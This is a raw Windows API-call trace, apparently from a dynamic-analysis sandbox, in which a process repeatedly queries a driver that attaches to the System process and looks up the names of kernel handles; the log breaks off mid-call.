[0200.030] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.030] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.030] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.030] PsAcquireProcessExitSynchronization () returned 0x0 [0200.030] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.030] ObReferenceObjectByHandle (in: Handle=0xffffffff8000066c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ecf400, HandleInformation=0x0) returned 0x0 [0200.030] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.030] PsReleaseProcessExitSynchronization () returned 0x2 [0200.031] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.031] ObQueryNameString (in: Object=0xfffffa8001ecf400, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.031] ObfDereferenceObject (Object=0xfffffa8001ecf400) returned 0x2 [0200.031] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.031] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.031] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.031] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.031] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.031] PsAcquireProcessExitSynchronization () returned 0x0 [0200.031] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.031] ObReferenceObjectByHandle (in: Handle=0xffffffff80000670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8ff20, HandleInformation=0x0) returned 0x0 [0200.031] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.032] PsReleaseProcessExitSynchronization () returned 0x2 [0200.032] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.032] ObQueryNameString (in: Object=0xfffffa8001f8ff20, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.032] ObfDereferenceObject (Object=0xfffffa8001f8ff20) returned 0x2 [0200.032] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.032] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.032] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.032] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.032] PsAcquireProcessExitSynchronization () returned 0x0 [0200.033] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.033] ObReferenceObjectByHandle (in: Handle=0xffffffff80000674, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003aa5f20, HandleInformation=0x0) returned 0x0 [0200.033] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.033] PsReleaseProcessExitSynchronization () returned 0x2 [0200.033] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.033] ObQueryNameString (in: Object=0xfffffa8003aa5f20, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.033] ObfDereferenceObject (Object=0xfffffa8003aa5f20) returned 0x2 [0200.033] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.033] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.033] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.033] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.033] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.033] PsAcquireProcessExitSynchronization () returned 0x0 [0200.033] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.033] ObReferenceObjectByHandle (in: Handle=0xffffffff80000678, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8d460, HandleInformation=0x0) returned 0x0 [0200.033] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.033] PsReleaseProcessExitSynchronization () returned 0x2 [0200.034] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.034] ObQueryNameString (in: Object=0xfffffa8001f8d460, ObjectNameInfo=0xfffffa8003162044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003162044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.034] ObfDereferenceObject (Object=0xfffffa8001f8d460) returned 0x2 [0200.034] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.034] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.034] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.034] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.034] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.034] PsAcquireProcessExitSynchronization () returned 0x0 [0200.034] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.034] ObReferenceObjectByHandle (in: Handle=0xffffffff8000067c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f56460, HandleInformation=0x0) returned 0x0 [0200.034] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.034] PsReleaseProcessExitSynchronization () returned 0x2 [0200.034] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.034] ObQueryNameString (in: Object=0xfffffa8001f56460, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.034] ObfDereferenceObject (Object=0xfffffa8001f56460) returned 0x2 [0200.034] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.035] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.035] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.035] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.035] PsAcquireProcessExitSynchronization () returned 0x0 [0200.035] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.035] ObReferenceObjectByHandle (in: Handle=0xffffffff80000680, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8ee50, HandleInformation=0x0) returned 0x0 [0200.035] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.035] PsReleaseProcessExitSynchronization () returned 0x2 [0200.035] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.035] ObQueryNameString (in: Object=0xfffffa8001f8ee50, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.035] ObfDereferenceObject (Object=0xfffffa8001f8ee50) returned 0x2 [0200.035] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.035] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.035] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0200.035] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.036] PsAcquireProcessExitSynchronization () returned 0x0 [0200.036] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.036] ObReferenceObjectByHandle (in: Handle=0xffffffff80000684, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002152810, HandleInformation=0x0) returned 0x0 [0200.036] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.036] PsReleaseProcessExitSynchronization () returned 0x2 [0200.036] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.036] ObQueryNameString (in: Object=0xfffffa8002152810, ObjectNameInfo=0xfffffa8003163044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003163044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.036] ObfDereferenceObject (Object=0xfffffa8002152810) returned 0x2 [0200.036] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.036] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.036] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.036] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.479] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.479] PsAcquireProcessExitSynchronization () returned 0x0 [0200.479] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.479] ObReferenceObjectByHandle (in: Handle=0xffffffff80000688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8c2c0, HandleInformation=0x0) returned 0x0 [0200.479] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.479] PsReleaseProcessExitSynchronization () returned 0x2 [0200.479] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.479] ObQueryNameString (in: Object=0xfffffa8001f8c2c0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.479] ObfDereferenceObject (Object=0xfffffa8001f8c2c0) returned 0x2 [0200.479] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.479] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.480] PsAcquireProcessExitSynchronization () returned 0x0 [0200.480] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.480] ObReferenceObjectByHandle (in: Handle=0xffffffff8000068c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f80ab0, HandleInformation=0x0) returned 0x0 [0200.480] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.480] PsReleaseProcessExitSynchronization () returned 0x2 [0200.480] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.480] ObQueryNameString (in: Object=0xfffffa8001f80ab0, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.480] ObfDereferenceObject (Object=0xfffffa8001f80ab0) returned 0x2 [0200.480] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.480] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.480] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.480] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.480] PsAcquireProcessExitSynchronization () returned 0x0 [0200.480] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.480] ObReferenceObjectByHandle (in: Handle=0xffffffff80000690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8dd20, HandleInformation=0x0) returned 0x0 [0200.480] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.480] PsReleaseProcessExitSynchronization () returned 0x2 [0200.480] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.480] ObQueryNameString (in: Object=0xfffffa8001f8dd20, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.480] ObfDereferenceObject (Object=0xfffffa8001f8dd20) returned 0x2 [0200.481] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.481] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.481] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.481] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.481] PsAcquireProcessExitSynchronization () returned 0x0 [0200.481] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.481] ObReferenceObjectByHandle (in: Handle=0xffffffff80000694, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f7ff20, HandleInformation=0x0) returned 0x0 [0200.481] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.481] PsReleaseProcessExitSynchronization () returned 0x2 [0200.481] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.481] ObQueryNameString (in: Object=0xfffffa8001f7ff20, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.481] ObfDereferenceObject (Object=0xfffffa8001f7ff20) returned 0x2 [0200.481] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.481] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.481] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.481] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.481] PsAcquireProcessExitSynchronization () returned 0x0 [0200.481] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.482] ObReferenceObjectByHandle (in: Handle=0xffffffff80000698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8c050, HandleInformation=0x0) returned 0x0 [0200.482] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.482] PsReleaseProcessExitSynchronization () returned 0x2 [0200.482] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.482] ObQueryNameString (in: Object=0xfffffa8001f8c050, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.482] ObfDereferenceObject (Object=0xfffffa8001f8c050) returned 0x2 [0200.482] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.482] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.482] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.482] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.482] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.482] PsAcquireProcessExitSynchronization () returned 0x0 [0200.482] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.482] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8cb80, HandleInformation=0x0) returned 0x0 [0200.482] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.482] PsReleaseProcessExitSynchronization () returned 0x2 [0200.482] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.482] ObQueryNameString (in: Object=0xfffffa8001f8cb80, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.483] ObfDereferenceObject (Object=0xfffffa8001f8cb80) returned 0x2 [0200.483] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.483] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.483] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.483] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.483] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.483] PsAcquireProcessExitSynchronization () returned 0x0 [0200.483] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.483] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f81b80, HandleInformation=0x0) returned 0x0 [0200.483] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.483] PsReleaseProcessExitSynchronization () returned 0x2 [0200.483] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.483] ObQueryNameString (in: Object=0xfffffa8001f81b80, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.483] ObfDereferenceObject (Object=0xfffffa8001f81b80) returned 0x2 [0200.483] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.483] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.483] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.483] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.483] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.483] PsAcquireProcessExitSynchronization () returned 0x0 [0200.484] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.484] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8a2c0, HandleInformation=0x0) returned 0x0 [0200.484] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.484] PsReleaseProcessExitSynchronization () returned 0x2 [0200.484] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.484] ObQueryNameString (in: Object=0xfffffa8001f8a2c0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.484] ObfDereferenceObject (Object=0xfffffa8001f8a2c0) returned 0x2 [0200.484] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.484] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.484] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.484] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, 